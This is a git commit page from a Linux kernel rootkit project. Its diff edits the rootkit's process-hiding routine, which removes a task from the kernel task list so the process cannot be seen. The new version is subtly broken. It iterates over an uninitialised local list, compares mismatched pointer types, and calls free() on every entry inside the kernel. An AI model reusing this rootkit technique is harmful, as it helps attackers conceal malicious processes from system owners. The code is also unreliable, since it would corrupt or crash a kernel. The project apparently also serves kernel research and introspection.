attept list_for_each_safe - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 19c9c4d360340e54a932d1d0cf4e2a9c57fded32
parent dcfce15b0394b6e85aaa5a20e4f3289b20125b92
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 03:08:26 +0100

attept list_for_each_safe

Diffstat:
M rootkit/src/pidhide.c  | 17 ++++++++++++++---

1 file changed, 14 insertions(+), 3 deletions(-)
diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -2,7 +2,7 @@
 #include <linux/pid.h>
 #include <linux/sched.h>
 #include <linux/proc_fs.h>
-#include <linux/task.h>
+#include <linux/sched/task.h>
 
 #include "hook.h"
 #include "pidhide.h"
@@ -74,12 +74,23 @@ hide_pid(pid_t pid)
     if (!ts)
         return;
 
+    struct task_struct *tmp;
+    struct list_head *pos, *q;
+    struct task_struct mylist;
+
+
+
     rcu_read_lock();
     atomic_dec(&__task_cred(ts)->user->processes);
     rcu_read_unlock();
 
-	write_lock_irq(rwlock);
-    list_del(&ts->tasks);
+    write_lock_irq(rwlock);
+    list_for_each_safe(pos, q, &mylist.tasks){
+        tmp= list_entry(pos, struct task_struct, tasks);
+        if (pos == ts)
+            list_del(pos);
+        free(tmp);
+    }
     write_unlock_irq(rwlock);
 }

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs